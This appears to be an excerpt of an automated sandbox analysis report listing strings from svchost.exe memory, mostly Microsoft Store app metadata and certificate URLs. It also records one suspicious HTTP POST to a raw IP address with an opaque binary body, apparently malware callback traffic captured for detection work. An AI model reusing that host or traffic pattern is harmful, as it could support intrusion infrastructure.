                    Source: svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
                    Source: svchost.exe, 00000021.00000003.561249229.000001AB9EFA8000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: svchost.exe, 00000021.00000003.561249229.000001AB9EFA8000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: svchost.exe, 00000021.00000003.561249229.000001AB9EFA8000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: svchost.exe, 00000021.00000003.564393869.000001AB9EF1F000.00000004.00000001.sdmpString found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-03-15T21:09:58.8377117Z||.||1ad32855-590c-405c-8d49-1a557bf58211||1152921505693277189||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-03-15T21:09:05.1816176Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free* texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
                    Source: svchost.exe, 00000021.00000003.564189314.000001AB9EF62000.00000004.00000001.sdmpString found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-03-15T21:09:58.8377117Z||.||1ad32855-590c-405c-8d49-1a557bf58211||1152921505693277189||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-03-15T21:09:05.1816176Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free* texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
                    Source: svchost.exe, 00000021.00000003.564393869.000001AB9EF1F000.00000004.00000001.sdmpString found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","SkuTitle":"Messenger","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9WZDNCRF0083","Properties":{"FulfillmentData":{"ProductId":"9WZDNCRF0083","WuCategoryId":"c6a9fa5c-20a2-4e12-904d-edd408657dc8","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x64"],"Capabilities":["runFullTrust","internetClient","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":137845484,"PackageFormat":"Appx","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","MainPackageFamilyNameForDlc":null,"PackageFullName":"FACEBOOK.317180B0BB486_950.7.118.0_x64__8xx8rvfyw5nnt","PackageId":"9f0b5036-3839-33f0-1d64-45190b6cc3d7-X64","PackageRank":30002,"PlatformDependencies":[{"MaxTested":2814750970478592,"MinVersion":2814750438195200,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"FACEBOOK.317180B0BB486_950.7.118.0_x64__8xx8rvfyw5nnt\",\"content.productId\":\"3219d30d-4a23-4f58-a91c-c44b04e6a0c7\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750970478592,\"platform.minVersion\":2814750438195200,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Social\",\"optOut.backu
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 436Connection: Keep-AliveCache-Control: no-cacheData Raw: 7b 60 06 d1 44 a5 d6 e2 88 48 bf 43 38 5e e0 29 73 bc 94 ef 47 0e 26 50 73 f5 61 5e 1e fd ab c1 56 bb 26 46 4e bc a8 10 ae 67 12 4d 61 10 96 f7 9c 41 c4 71 4b 45 b0 27 b0 1d c3 d3 30 10 09 05 6c 57 7b c7 15 3e d8 72 b4 68 52 84 30 29 f3 d0 31 24 2f 16 54 8b 91 c3 8b 3b bc 0a 1b 1c ea 1d 69 cc ed 4f dd dd 75 7b 53 72 de 1a fe be 9a 32 49 68 da 46 5d 1b 5d 0b b4 b0 0b ca 0a 2e 91 5e d6 f1 2f f3 9e 5f 4d 3c 1d c2 e8 8f f0 e6 f1 cd c2 38 65 20 25 cc e3 2f 79 9e be 9c 0b b0 5a 77 9f 2d f8 f3 6b 14 41 a1 37 d9 ea 08 fe 01 53 94 98 35 d9 ae aa c9 7f ba 46 11 8d 4d 42 c2 d0 35 31 1d 11 e3 ef c1 e4 b1 2a 5e 52 2e 46 a1 2a 23 84 2c 3e 31 ff eb 6f f0 6c 89 46 28 5a c9 87 0d c7 05 74 29 52 f2 ac 3a 76 ca 32 37 b4 0f ec 2d df 3d bf 54 be 3a 03 fd c8 90 f8 09 15 0d 9f 8f 77 2d 93 58 c1 c8 b4 33 7f cc de 29 37 2f 26 f5 ca 2b d0 5d d8 dc f5 09 73 66 4d 68 0d d6 10 f1 50 56 df 5c 25 29 f2 7b e0 54 04 c9 36 88 07 b8 9d 4c d4 dc 64 c9 be e4 33 40 40 41 7b 0a 62 15 e0 ad 48 a7 85 ee bc 6b 25 93 dd a5 5e 68 d5 ea cb 1f 96 23 96 d1 66 1e af a7 d6 38 35 b5 a2 67 af 72 c4 00 16 5f 75 ad 1a 58 61 49 4b 2d f5 1f 9b 12 b6 14 2b cd 47 01 53 51 a8 18 a2 be 3c f2 b6 cb 11 7d 23 f5 0a b7 59 d2 c8 9f a3 0e 7d bf c0 e4 0f af a2 4d 48 e3 df 84 ce 33 f5 9e 92 eb 7b 30 0e c0 f6 d6 24 27 e1 a5 4f f6 0b 46 7c 59 26 73 68 1f Data Ascii: {`DHC8^)sG&Psa^V&FNgMaAqKE'0lW{>rhR0)1$/T;iOu{Sr2IhF]].^/_M<8e %/yZw-kA7S5FMB51*^R.F*#,>1olF(Zt)R:v27-=T:w-X3)7/&+]sfMhPV\%){T6Ld3@@A{bHk%^h#f85gr_uXaIK-+GSQ<}#Y}MH3{0$'OF|Y&sh
                    Source: svchost.exe, 00000023.00000003.817201176.000001E91F73B000.00000004.00000001.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsdp.as
                    Source: svchost.exe, 00000023.00000002.1283907175.000001E91FC13000.00000004.00000001.sdmpString found in binary or memory: http://Passport.NET/tbpose
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: svchost.exe, 00000021.00000002.588532098.000001AB9E6EA000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: svchost.exe, 00000021.00000002.588532098.000001AB9E6EA000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
                    Source: svchost.exe, 00000007.00000002.597695297.000001CC04417000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: svchost.exe, 00000021.00000002.588532098.000001AB9E6EA000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
                    Source: svchost.exe, 00000023.00000003.1128521121.000001E91F752000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.o0
                    Source: svchost.exe, 00000023.00000003.1128451283.000001E91F788000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.811531536.000001E91F72F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
                    Source: svchost.exe, 00000023.00000003.817201176.000001E91F73B000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdP
                    Source: svchost.exe, 00000023.00000003.811531536.000001E91F72F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsddd
